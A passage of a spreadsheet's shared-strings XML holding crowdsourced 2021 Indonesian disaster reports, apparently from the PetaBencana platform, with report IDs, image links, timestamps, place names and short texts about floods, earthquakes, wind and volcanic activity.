    <t>6e920dca-71b2-41c8-b074-e4d9cde9bc04</t>
  </si>
  <si>
    <t>I'm drowning, send help</t>
  </si>
  <si>
    <t>Bangkala</t>
  </si>
  <si>
    <t>11.57.23</t>
  </si>
  <si>
    <t>5340b8a3-21a2-407a-88b9-0f5d3d6939d3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5340b8a3-21a2-407a-88b9-0f5d3d6939d3.jpg</t>
  </si>
  <si>
    <t>09.32.51</t>
  </si>
  <si>
    <t>af273f9c-c25f-4f6b-9c89-c0a194b28f3d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/af273f9c-c25f-4f6b-9c89-c0a194b28f3d.jpg</t>
  </si>
  <si>
    <t>Banjir di depan RSUD I. A MOEIS SAMARINDA Dengan ketinggian 40 cm Arus lalu lintas terganggu aliran air cukup deras Hisma_pramuka peduli"</t>
  </si>
  <si>
    <t>Harapan Baru</t>
  </si>
  <si>
    <t>09.34.15</t>
  </si>
  <si>
    <t>c333ed9b-37e7-47df-818b-07c865d8b967</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c333ed9b-37e7-47df-818b-07c865d8b967.jpg</t>
  </si>
  <si>
    <t>11.01.26</t>
  </si>
  <si>
    <t>8bff2212-b0a8-4b99-9922-fcfb28a499c6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8bff2212-b0a8-4b99-9922-fcfb28a499c6.jpg</t>
  </si>
  <si>
    <t>Banjir 08 September 2021 di jalan trans kalimantan Kasongan - Palangka Raya</t>
  </si>
  <si>
    <t>12.18.43</t>
  </si>
  <si>
    <t>0c050107-4f9d-49bf-8d42-0c0df44186ca</t>
  </si>
  <si>
    <t>Saya melaporkan banjir di Kalimantan Tengah yang sudah sampai lutut. Saya mendengar kabarnya dari teman saya.</t>
  </si>
  <si>
    <t>Geragu</t>
  </si>
  <si>
    <t>Pulau Malan</t>
  </si>
  <si>
    <t>15.52.51</t>
  </si>
  <si>
    <t>e3b27848-51e2-42f3-9a63-179d014b8503</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e3b27848-51e2-42f3-9a63-179d014b8503.jpg</t>
  </si>
  <si>
    <t>kalimantan tengah kotawaringin barat kebanjiran</t>
  </si>
  <si>
    <t>23.44.00</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/GNg8dGKTS7cf6SHsMwUnPgcOtQ2bXFZbcdcmT9J_DlCpTl0cInL2gjkwKjSxWc-0xgVvL2xGOvbdxh3e5sm6LCaDJeBMJpFcVr76yeBrhnk=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil  mohon bantuannya untuk melakukan peningkatan peninggian jalan, karena sering terjadi banjir setiap hujan turun. mohon untuk di tindak lanjuti. terima kasih</t>
  </si>
  <si>
    <t>08.19.30</t>
  </si>
  <si>
    <t>f99a20a0-7135-4fae-b21d-c301b0c9ee63</t>
  </si>
  <si>
    <t>Banjir di Mendawai Seberang, Kotawaringin Barat</t>
  </si>
  <si>
    <t>Mendawai Seberang</t>
  </si>
  <si>
    <t>17.02.48</t>
  </si>
  <si>
    <t>3b6aa5a7-d29d-4d57-a783-f3c1dfb67b56</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3b6aa5a7-d29d-4d57-a783-f3c1dfb67b56.jpg</t>
  </si>
  <si>
    <t>Banjir menggenangi wilayah Perumahan Bengkuring Raya, Jalan Terong Pipit</t>
  </si>
  <si>
    <t>20.25.36</t>
  </si>
  <si>
    <t>50077d32-d098-40a2-8b4d-3d9f0edd9589</t>
  </si>
  <si>
    <t>Gempa terasa sekali di Bali,  strange animal behavior</t>
  </si>
  <si>
    <t>04.51.39</t>
  </si>
  <si>
    <t>215fc835-5212-4046-8c33-363b34ddd56e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/215fc835-5212-4046-8c33-363b34ddd56e.jpg</t>
  </si>
  <si>
    <t>Jalan Kh Harun Nafsi, Rapak Dalam terendam banjir dengan ketinggian 34cm</t>
  </si>
  <si>
    <t>05.09.21</t>
  </si>
  <si>
    <t>e7c41d03-9943-4b13-bd2d-2a6131041eac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e7c41d03-9943-4b13-bd2d-2a6131041eac.jpg</t>
  </si>
  <si>
    <t>Situasi di Jl. Di Panjaitan, depan bukit Alaya, Samarinda</t>
  </si>
  <si>
    <t>05.11.38</t>
  </si>
  <si>
    <t>5d137290-4057-4888-9edf-c9935e3be916</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5d137290-4057-4888-9edf-c9935e3be916.jpg</t>
  </si>
  <si>
    <t>Banjir 30CM jalan Ciptomangunkusumo #Busam Peduli Bencana"</t>
  </si>
  <si>
    <t>Sungai Keledang</t>
  </si>
  <si>
    <t>Samarinda Seberang</t>
  </si>
  <si>
    <t>05.14.50</t>
  </si>
  <si>
    <t>a19a1aee-fac6-4b75-afc3-d44510ffbbed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a19a1aee-fac6-4b75-afc3-d44510ffbbed.jpg</t>
  </si>
  <si>
    <t>Ketinggian air hingga dada orang dewasa</t>
  </si>
  <si>
    <t>Lempake</t>
  </si>
  <si>
    <t>05.18.30</t>
  </si>
  <si>
    <t>83a22a31-f3f3-4069-a586-bf5c04f1b691</t>
  </si>
  <si>
    <t>https://images.petabencana.id/83a22a31-f3f3-4069-a586-bf5c04f1b691.jpg</t>
  </si>
  <si>
    <t>05.21.57</t>
  </si>
  <si>
    <t>10e77148-844f-46c8-984c-37be0418c90d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/10e77148-844f-46c8-984c-37be0418c90d.jpg</t>
  </si>
  <si>
    <t>Jalan Ham Rifaddin, tepatnya depan SMA PLUS MELATI, Samarinda</t>
  </si>
  <si>
    <t>05.37.05</t>
  </si>
  <si>
    <t>a1941abe-b5b6-4d97-ac0c-725b171a0e56</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a1941abe-b5b6-4d97-ac0c-725b171a0e56.jpg</t>
  </si>
  <si>
    <t>Pohon Tumbang di Jl. Rapak Indah tepatnya depan Pombensin Rapak Indah, Samarinda</t>
  </si>
  <si>
    <t>Loa Bakung</t>
  </si>
  <si>
    <t>05.39.39</t>
  </si>
  <si>
    <t>de8a604f-f4c1-4899-a9dd-f2ee884838ed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/de8a604f-f4c1-4899-a9dd-f2ee884838ed.jpg</t>
  </si>
  <si>
    <t>Banjir Di Simpang Sempaja, Samarinda, Beberapa Kendaraan Mogok</t>
  </si>
  <si>
    <t>05.41.36</t>
  </si>
  <si>
    <t>1af61b0d-6e5b-43e0-a547-be03ae48a511</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1af61b0d-6e5b-43e0-a547-be03ae48a511.jpg</t>
  </si>
  <si>
    <t>Banjir 32CM Depan Rs. Moeis #Busam Peduli Bencana"</t>
  </si>
  <si>
    <t>05.53.09</t>
  </si>
  <si>
    <t>095601c6-e429-4a3b-bfec-9d7ca2b1363b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/095601c6-e429-4a3b-bfec-9d7ca2b1363b.jpg</t>
  </si>
  <si>
    <t>Banjir 40cm Jl. KH Harun Nafsi / Rapak Dalam #Busam Peduli Bencana"</t>
  </si>
  <si>
    <t>06.08.43</t>
  </si>
  <si>
    <t>0331d6ae-3fc7-4365-b3f4-25561ab3508a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0331d6ae-3fc7-4365-b3f4-25561ab3508a.jpg</t>
  </si>
  <si>
    <t>Banjir 45CM Jl. KH Harun Nafsi / Hindari jalur ini #Busam Peduli Bencana"</t>
  </si>
  <si>
    <t>03.27.52</t>
  </si>
  <si>
    <t>1db90063-cd71-4156-a065-be2402281bae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1db90063-cd71-4156-a065-be2402281bae.jpg</t>
  </si>
  <si>
    <t>Banjir Di Jalan Slada 7 Bengkuring, Samarinda</t>
  </si>
  <si>
    <t>03.51.00</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Qhh5v9xhk4Gq682tRoSJcWBfKYesKrd0kOAln4mBbRwgm2pUY3Hb7rpF-rMJz1BYg0X7EOQirpUITkdQ4Vprvw0_HMIE522ceNUDP6e0=s480-c</t>
  </si>
  <si>
    <t>mohon di tindak lanjuti pengangkatan jalan di Gg. akur rtRT. 12 Rw. 05 tugu selatan ini sudah diusulkannsetiap Musrenbang dari th 90 han selalu peringkat pertama dan sudah berapa kali di survai dan diukur tapi tidak pernah ada kelanjutan ya  sampe dimint</t>
  </si>
  <si>
    <t>10.52.45</t>
  </si>
  <si>
    <t>5efaa6d6-1fca-4a6b-b98b-677f973ff685</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5efaa6d6-1fca-4a6b-b98b-677f973ff685.jpg</t>
  </si>
  <si>
    <t>hooo</t>
  </si>
  <si>
    <t>15.39.29</t>
  </si>
  <si>
    <t>37155606-5734-4a86-9d31-2117cbca3823</t>
  </si>
  <si>
    <t>https://images.petabencana.id/37155606-5734-4a86-9d31-2117cbca3823.jpg</t>
  </si>
  <si>
    <t>Rumah warga terendam banjir di Kelurahan Raja Seberang, Kecamatan Arut Selatan, Pangkalan Bun, Kotawaringin Barat</t>
  </si>
  <si>
    <t>Raja Seberang</t>
  </si>
  <si>
    <t>15.45.28</t>
  </si>
  <si>
    <t>7c7e5edc-f45a-4021-be93-a10b4c72ca29</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7c7e5edc-f45a-4021-be93-a10b4c72ca29.jpg</t>
  </si>
  <si>
    <t>Rumah warga Kel. Raja Seberang yang terdampak banjir (IG : rajaseberang).</t>
  </si>
  <si>
    <t>23.47.10</t>
  </si>
  <si>
    <t>8bb39a48-0698-48e2-82ad-32758494c48b</t>
  </si>
  <si>
    <t>Hujan sejak tadi malam mengakibatkan terjadinya banjir di Rangkasbitung, Lebak-Banten</t>
  </si>
  <si>
    <t>Sindangmulya</t>
  </si>
  <si>
    <t>Maja</t>
  </si>
  <si>
    <t>Lebak</t>
  </si>
  <si>
    <t>00.31.00</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/tiEfNrnZKJooJ9TVf9BXIm66uNLiaUt_Silf6Q8_eRnXE_0VGxqxVqkVVn4BpeAV0NZbwII3pPOOl0yRz0pdBllmvT_jK8p5ThvxiYVU=s480-c</t>
  </si>
  <si>
    <t>laporan Banjir di SDN Lagoa 11 kurang lebih 10-15 cm di lapangan sekolah, mohon ada pengerukan got/saluran air sekitar lingkungan sekolah. terima kasih</t>
  </si>
  <si>
    <t>06.09.54</t>
  </si>
  <si>
    <t>8c79147b-9ebe-480c-89f9-ed991c733914</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c79147b-9ebe-480c-89f9-ed991c733914.jpg</t>
  </si>
  <si>
    <t>Banjir bandang terjadi di Kabuoaten Kepulauan Yapen Prov. Papua pada hari selasa 14 September 2021, pukul 06.00 WIT, Jam 6 pagi Waktu Papua.</t>
  </si>
  <si>
    <t>Anataurei</t>
  </si>
  <si>
    <t>Yapen Selatan</t>
  </si>
  <si>
    <t>Kepulauan Yapen</t>
  </si>
  <si>
    <t>09.12.36</t>
  </si>
  <si>
    <t>20cf4ae1-2674-4ffd-9ca1-d410f520bf27</t>
  </si>
  <si>
    <t>https://images.petabencana.id/20cf4ae1-2674-4ffd-9ca1-d410f520bf27.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 78, "report_type": "flood" }</t>
  </si>
  <si>
    <t>hujan deras dari pagi</t>
  </si>
  <si>
    <t>Serui Kota</t>
  </si>
  <si>
    <t>09.14.21</t>
  </si>
  <si>
    <t>da7a654b-a090-41a9-9bfd-557c541649f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/da7a654b-a090-41a9-9bfd-557c541649f9.jpg</t>
  </si>
  <si>
    <t>hujan lebat</t>
  </si>
  <si>
    <t>09.30.22</t>
  </si>
  <si>
    <t>e7891341-7bca-4e8b-b2ab-447b78ea380a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e7891341-7bca-4e8b-b2ab-447b78ea380a.jpg</t>
  </si>
  <si>
    <t>Ruas Jalan Serang-Petir Tepatnya Di Lingkungan Kab Lebak.</t>
  </si>
  <si>
    <t>09.55.45</t>
  </si>
  <si>
    <t>dc1a64ec-b955-440c-8a05-adb65e34325b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dc1a64ec-b955-440c-8a05-adb65e34325b.jpg</t>
  </si>
  <si>
    <t>Rangkas banjir ...perumahan palaton</t>
  </si>
  <si>
    <t>Muara Ciujung Timur</t>
  </si>
  <si>
    <t>Rangkasbitung</t>
  </si>
  <si>
    <t>03.04.38</t>
  </si>
  <si>
    <t>34b118f1-f62a-4d7e-bb04-73553ef10556</t>
  </si>
  <si>
    <t>https://images.petabencana.id/34b118f1-f62a-4d7e-bb04-73553ef10556.jpg</t>
  </si>
  <si>
    <t>Banjir Di Simpang 3 Pasundan Samarinda setinggi 45cm</t>
  </si>
  <si>
    <t>05.20.31</t>
  </si>
  <si>
    <t>8202e0a4-e0ba-48d7-92f2-3e0a010f716b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8202e0a4-e0ba-48d7-92f2-3e0a010f716b.jpg</t>
  </si>
  <si>
    <t>Situasi Banjir Di Jalan Pelita, Purwajaya Loa Janan, Samarinda</t>
  </si>
  <si>
    <t>Purwajaya</t>
  </si>
  <si>
    <t>Loa Janan</t>
  </si>
  <si>
    <t>Kutai Kartanegara</t>
  </si>
  <si>
    <t>05.21.36</t>
  </si>
  <si>
    <t>3bbc95fa-cdb6-49f2-bc0c-75dca3c0f46f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3bbc95fa-cdb6-49f2-bc0c-75dca3c0f46f.jpg</t>
  </si>
  <si>
    <t>Banjir di Jalan Ham Rifaddin depan Smpn 36 Samarinda</t>
  </si>
  <si>
    <t>05.24.58</t>
  </si>
  <si>
    <t>aebe316d-4851-4989-8e34-27c355fc29bb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aebe316d-4851-4989-8e34-27c355fc29bb.jpg</t>
  </si>
  <si>
    <t>Banjir di Jalan Padat Karya 1 Purwajaya, Samarinda</t>
  </si>
  <si>
    <t>18.57.26</t>
  </si>
  <si>
    <t>71da7c28-d1c9-4268-9d2d-3b13ed24a878</t>
  </si>
  <si>
    <t>https://images.petabencana.id/71da7c28-d1c9-4268-9d2d-3b13ed24a878.jpg</t>
  </si>
  <si>
    <t>Untuk saat air masih dalam sekitar badan orang dewasa</t>
  </si>
  <si>
    <t>Simpang Tiga</t>
  </si>
  <si>
    <t>12.37.46</t>
  </si>
  <si>
    <t>288a3ec9-88c7-48cf-ae1a-879cd0404e22</t>
  </si>
  <si>
    <t>https://images.petabencana.id/288a3ec9-88c7-48cf-ae1a-879cd0404e22.jpg</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 16, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir langganan ketika hujan deras ....</t>
  </si>
  <si>
    <t>Patoloan</t>
  </si>
  <si>
    <t>Bone-Bone</t>
  </si>
  <si>
    <t>13.12.53</t>
  </si>
  <si>
    <t>c6663a22-8b7c-4df5-94bd-8bbe923faa69</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c6663a22-8b7c-4df5-94bd-8bbe923faa69.jpg</t>
  </si>
  <si>
    <t>Meskipun hujan mulai reda, di sini masih ada genangan air</t>
  </si>
  <si>
    <t>13.53.53</t>
  </si>
  <si>
    <t>9452e962-fa4a-45e8-91f4-810673740a8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9452e962-fa4a-45e8-91f4-810673740a8c.jpg</t>
  </si>
  <si>
    <t>Udah masuk beberapa rumah</t>
  </si>
  <si>
    <t>14.05.13</t>
  </si>
  <si>
    <t>edb4d7cd-ac7d-427c-94eb-c2d085fa073a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/edb4d7cd-ac7d-427c-94eb-c2d085fa073a.jpg</t>
  </si>
  <si>
    <t>Jalanan samping rumah sudah perkiraan selutut orang dewasa</t>
  </si>
  <si>
    <t>15.07.55</t>
  </si>
  <si>
    <t>e5bc527d-defd-43ff-aafb-fe170a8c8fad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e5bc527d-defd-43ff-aafb-fe170a8c8fad.jpg</t>
  </si>
  <si>
    <t>Debit air masih bertambah, semoga hujan segera reda</t>
  </si>
  <si>
    <t>08.49.36</t>
  </si>
  <si>
    <t>d5973b5a-5122-430a-80c1-b938caf0b985</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d5973b5a-5122-430a-80c1-b938caf0b985.jpg</t>
  </si>
  <si>
    <t>hujan yang mengguyur wilayah Aceh jaya menyebabkan terjadinya banjir mencapai 60 cm dan masuk ke rumah warga. Sebanyak 412 jiwa mengungsi</t>
  </si>
  <si>
    <t>Masen</t>
  </si>
  <si>
    <t>Darul Hikmah</t>
  </si>
  <si>
    <t>Aceh Jaya</t>
  </si>
  <si>
    <t>07.30.08</t>
  </si>
  <si>
    <t>6dc48944-0afc-4024-8923-0c89052c3ce5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6dc48944-0afc-4024-8923-0c89052c3ce5.jpg</t>
  </si>
  <si>
    <t>{ "impact": 2, "points": 1, "report_type": "wind" }</t>
  </si>
  <si>
    <t>Rabu 22 September 2021 pukul 17:00 wib Telah terjadi angin puting beliu di desa payageli dan kerusakan 12 rumah dan 1 mesjid DKRB Riskiismai</t>
  </si>
  <si>
    <t>Sunggal Kanan</t>
  </si>
  <si>
    <t>05.44.43</t>
  </si>
  <si>
    <t>a9deea88-147c-4429-97e6-acb68dbbd2ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a9deea88-147c-4429-97e6-acb68dbbd2ee.jpg</t>
  </si>
  <si>
    <t>hujan deras serta angin kencang tapi tidak mengalami kerusakan hanya benda benda kecil berterbangan.</t>
  </si>
  <si>
    <t>Batoh</t>
  </si>
  <si>
    <t>Lueng Bata</t>
  </si>
  <si>
    <t>08.23.36</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/361545</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/09/29/16329038151508773094.jpg</t>
  </si>
  <si>
    <t>Cegah Banjir, Saluran Air di Jalan H Agus Salim Diperbaiki</t>
  </si>
  <si>
    <t>Terjadi perbaikan saluran air di Jalan Haji Agus Salim, Jakarta Pusat. Perbaikan saluran air kini menjadi fokus Pemprov DKI dalam menanggulangi banjir yang saat ini sudah memasuki musim hujan.</t>
  </si>
  <si>
    <t>18.53.43</t>
  </si>
  <si>
    <t>93f96d58-422a-4633-91e7-2162017d44ee</t>
  </si>
  <si>
    <t>Hujan derass, banjir</t>
  </si>
  <si>
    <t>Ulak Karang Selatan</t>
  </si>
  <si>
    <t>11:08:00.823</t>
  </si>
  <si>
    <t>e50979e6-6b0b-410c-9a70-9ef86d001f70</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e50979e6-6b0b-410c-9a70-9ef86d001f70.jpg</t>
  </si>
  <si>
    <t>Banjir Bandang dan Longsor. Arus air yang membawa lumpur &amp; kayu membuat bendungan Batusitanduk jebol sehingga banjir parah @pradiptafirm</t>
  </si>
  <si>
    <t>Bolong</t>
  </si>
  <si>
    <t>Walenrang Utara</t>
  </si>
  <si>
    <t>Luwu</t>
  </si>
  <si>
    <t>12:46:59.439</t>
  </si>
  <si>
    <t>a265d6b2-8b60-4fec-9e51-f1ce69571fa9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a265d6b2-8b60-4fec-9e51-f1ce69571fa9.jpg</t>
  </si>
  <si>
    <t>Kedalaman banjir sudah mencapai lutut orang dewasa, kondisi air semakin naik dan arus air semakin deras,dilain tmpt banjir mencapai pinggang</t>
  </si>
  <si>
    <t>Mendik</t>
  </si>
  <si>
    <t>Long Kali</t>
  </si>
  <si>
    <t>Paser</t>
  </si>
  <si>
    <t>10:05:00.976</t>
  </si>
  <si>
    <t>bfc5203c-2da1-461c-bff9-f8a3fa6d4999</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bfc5203c-2da1-461c-bff9-f8a3fa6d4999.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3495", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>01:11:37.259</t>
  </si>
  <si>
    <t>ead10476-9aa3-440d-9a46-cb346188de21</t>
  </si>
  <si>
    <t>Deras air mengerus tembok sehingga terjadi pergerakan tanah yang mengakibatkan jebolnya tembok rumah di RT 03 RW 18 Kel. Cibabat kota Cimahi</t>
  </si>
  <si>
    <t>05:53:11.616</t>
  </si>
  <si>
    <t>84b76bb0-9f59-4c96-86e3-820bd9f5beeb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/84b76bb0-9f59-4c96-86e3-820bd9f5beeb.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "volcano", "volcanicSigns": [ 3 ], "evacuationNumber": 1, "evacuationArea": true }</t>
  </si>
  <si>
    <t>Pada tanggal 7 oktober merapi mengalami guguran lava pijar ke arah barat daya sekitar jam 21.21</t>
  </si>
  <si>
    <t>Hargo Binangun</t>
  </si>
  <si>
    <t>Pakem</t>
  </si>
  <si>
    <t>13:24:48.245</t>
  </si>
  <si>
    <t>961dd021-a82a-4706-a2ab-f440f01aefe4</t>
  </si>
  <si>
    <t>ada gempa di manado</t>
  </si>
  <si>
    <t>03:36:06.994</t>
  </si>
  <si>
    <t>23936915-6129-4c0a-9496-c6cfc3492c78</t>
  </si>
  <si>
    <t>Banjir Kec.Longkali Kab.Paser Prov.Kalimantan Timur</t>
  </si>
  <si>
    <t>06:36:28.506</t>
  </si>
  <si>
    <t>9d790fd2-60d6-45c7-a939-f580e22526b7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9d790fd2-60d6-45c7-a939-f580e22526b7.jpg</t>
  </si>
  <si>
    <t>13:23:24.825</t>
  </si>
  <si>
    <t>b19dfba6-d1ea-4bcc-a0ae-b68a78130f6f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b19dfba6-d1ea-4bcc-a0ae-b68a78130f6f.jpg</t>
  </si>
  <si>
    <t>Banjir dah mulai surut trimakasih dan bila hujan deras selalu banjir karna penyempitan irigasi</t>
  </si>
  <si>
    <t>Sumber Agung</t>
  </si>
  <si>
    <t>Kemiling</t>
  </si>
  <si>
    <t>20:32:47.426</t>
  </si>
  <si>
    <t>0295ca73-c804-45b2-b839-ebcb62aea2f1</t>
  </si>
  <si>
    <t>Belum cek keluar</t>
  </si>
  <si>
    <t>Kedewatan</t>
  </si>
  <si>
    <t>Ubud</t>
  </si>
  <si>
    <t>Gianyar</t>
  </si>
  <si>
    <t>08:34:08.743</t>
  </si>
  <si>
    <t>51d2d450-8def-4e5a-98c8-13efc1ae4c00</t>
  </si>
  <si>
    <t>https://images.petabencana.id/51d2d450-8def-4e5a-98c8-13efc1ae4c00.jpg</t>
  </si>
  <si>
    <t>Saat ini di Desa Rintisan pada (15/10) air mulai naik  menyisakan 2 jengkal lagi akan sampai keteras rumah warga.</t>
  </si>
  <si>
    <t>Rintisan</t>
  </si>
  <si>
    <t>Danau Panggang</t>
  </si>
  <si>
    <t>Hulu Sungai Utara</t>
  </si>
  <si>
    <t>11:50:18.388</t>
  </si>
  <si>
    <t>4fca969e-26cf-407c-9898-8cb18a99f86a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4fca969e-26cf-407c-9898-8cb18a99f86a.jpg</t>
  </si>
  <si>
    <t>Giat PMI Kabupaten Karangasem Respon Gempa Bumi di Desa Ban Kecamatan Kubu Kabupaten Karangasem"</t>
  </si>
  <si>
    <t>Karang Asem</t>
  </si>
  <si>
    <t>11:07:06.198</t>
  </si>
  <si>
    <t>3a1b917a-58cf-4eb9-960d-c54c894b991d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3a1b917a-58cf-4eb9-960d-c54c894b991d.jpg</t>
  </si>
  <si>
    <t>Giat PMI Respon Gempa Bumi di Desa Ban Kecamatan Kubu, karangasem Prov.Bali</t>
  </si>
  <si>
    <t>04:39:43.752</t>
  </si>
  <si>
    <t>5bada35b-1035-4b32-8b53-69152fdd51d4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5bada35b-1035-4b32-8b53-69152fdd51d4.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 7, "report_type": "flood" }</t>
  </si>
  <si>
    <t>07:25:03.174</t>
  </si>
  <si>
    <t>63810413-ef42-4486-bd0f-d2bc91ae2c26</t>
  </si>
  <si>
    <t>https://images.petabencana.id/63810413-ef42-4486-bd0f-d2bc91ae2c26.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "condition": 0, "report_type": "road", "accessabilityFailure": 1 }</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>Datah</t>
  </si>
  <si>
    <t>Abang</t>
  </si>
  <si>
    <t>08:35:22.042</t>
  </si>
  <si>
    <t>61f13d80-95b1-4f2a-b1c9-902be4f6eebe</t>
  </si>
  <si>
    <t>_</t>
  </si>
  <si>
    <t>Culik</t>
  </si>
  <si>
    <t>06:20:16.570</t>
  </si>
  <si>
    <t>a499ce90-d9ad-493f-aa91-a2c9ae42f1c6</t>
  </si>
  <si>
    <t>banjir di daerah rawa makmur bengkulu mencapai ketinggian lutut orang dewasa</t>
  </si>
  <si>
    <t>Rawa Makmur</t>
  </si>
  <si>
    <t>Muara Bangka Hulu</t>
  </si>
  <si>
    <t>19:53:48.814</t>
  </si>
  <si>
    <t>7f53d43f-908f-45e5-a852-ebbcb4db30b6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7f53d43f-908f-45e5-a852-ebbcb4db30b6.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi pinggang orang dewasa, belum ada pengungsian karna banjir yang tiba tiba di karenakan hujan deras selama beberapa hari.</t>
  </si>
  <si>
    <t>05:44:21.076</t>
  </si>
  <si>
    <t>16d10b39-deb9-48c9-9708-c64a06527e29</t>
  </si>
  <si>
    <t>https://images.petabencana.id/16d10b39-deb9-48c9-9708-c64a06527e29.jpg</t>
  </si>
  <si>
    <t>Banjir terjadi karena sudah banyaknya lahan kosong dijadikan perumahan, sehingga berkurangnya tempat peresapan air.</t>
  </si>
  <si>
    <t>Sawit Rejo</t>
  </si>
  <si>
    <t>Kutalimbaru</t>
  </si>
  <si>
    <t>07:00:27.729</t>
  </si>
  <si>
    <t>5acfdc0f-8764-4d6f-b5a0-0bbc3d777d1a</t>
  </si>
  <si>
    <t>Beberapa hari lalu telah terjadi gempa di kabupaten Karangasem, banyak bangunan yang roboh akibat gempa ini semoga ada bantuan dari pemerint</t>
  </si>
  <si>
    <t>09:06:11.173</t>
  </si>
  <si>
    <t>95d8dff7-2c54-4fe1-b206-3efadb97ff05</t>
  </si>
  <si>
    <t>https://images.petabencana.id/95d8dff7-2c54-4fe1-b206-3efadb97ff05.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 94, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Dari denpasar kita hingga nusa dua tenggara kebanjiran</t>
  </si>
  <si>
    <t>11:00:32.951</t>
  </si>
  <si>
    <t>cc7de277-af2c-42b2-8651-425312730bf8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cc7de277-af2c-42b2-8651-425312730bf8.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "condition": 0, "report_type": "road", "accessabilityFailure": 1 }</t>
  </si>
  <si>
    <t>­ƒÿ¡­ƒÿ¡­ƒÿ¡­ƒÿ¡</t>
  </si>
  <si>
    <t>Pujungan</t>
  </si>
  <si>
    <t>Pupuan</t>
  </si>
  <si>
    <t>Tabanan</t>
  </si>
  <si>
    <t>08:31:37.554</t>
  </si>
  <si>
    <t>90df2105-0dd5-410b-a7fb-9bf150276596</t>
  </si>
  <si>
    <t>Gempa</t>
  </si>
  <si>
    <t>Kerta Mandala</t>
  </si>
  <si>
    <t>10:54:38.283</t>
  </si>
  <si>
    <t>616e9eda-5ffc-44cb-9ba5-2800a12c7eb1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/616e9eda-5ffc-44cb-9ba5-2800a12c7eb1.jpg</t>
  </si>
  <si>
    <t>Gempa bumi adalan getaran atau getar- getar yang terjadi di permukaan bumi akibat pelepasan</t>
  </si>
  <si>
    <t>08:06:39.291</t>
  </si>
  <si>
    <t>41e44203-5d8c-471a-aea0-3ab397fa8d68</t>
  </si>
  <si>
    <t>Gempa bumi misa mengakibatkan runtuhnya rumah. Kejadian ini bisa membuat orang tertimpa tembok bangunan rumah #Youth4GotongRotongAgus4DKR"</t>
  </si>
  <si>
    <t>Bunutan</t>
  </si>
  <si>
    <t>09:53:47.541</t>
  </si>
  <si>
    <t>d69775d1-ae28-41ca-be0e-2558b320133d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d69775d1-ae28-41ca-be0e-2558b320133d.jpg</t>
  </si>
  <si>
    <t>Gempa bumi yang getarannya sangat kuat dapat menyebabkan kerusakan di permukaan bumi, yaitu berupa hancurnya bangunan, rumah, fasilitas umum</t>
  </si>
  <si>
    <t>Purwakerti</t>
  </si>
  <si>
    <t>12:55:30.309</t>
  </si>
  <si>
    <t>c351c98e-7314-476c-8410-a24a7c98210f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c351c98e-7314-476c-8410-a24a7c98210f.jpg</t>
  </si>
  <si>
    <t>Gempa di bali</t>
  </si>
  <si>
    <t>11:36:35.479</t>
  </si>
  <si>
    <t>c12538f2-8438-45d8-9c28-cde00713a3b1</t>
  </si>
  <si>
    <t>Gempa susulan</t>
  </si>
  <si>
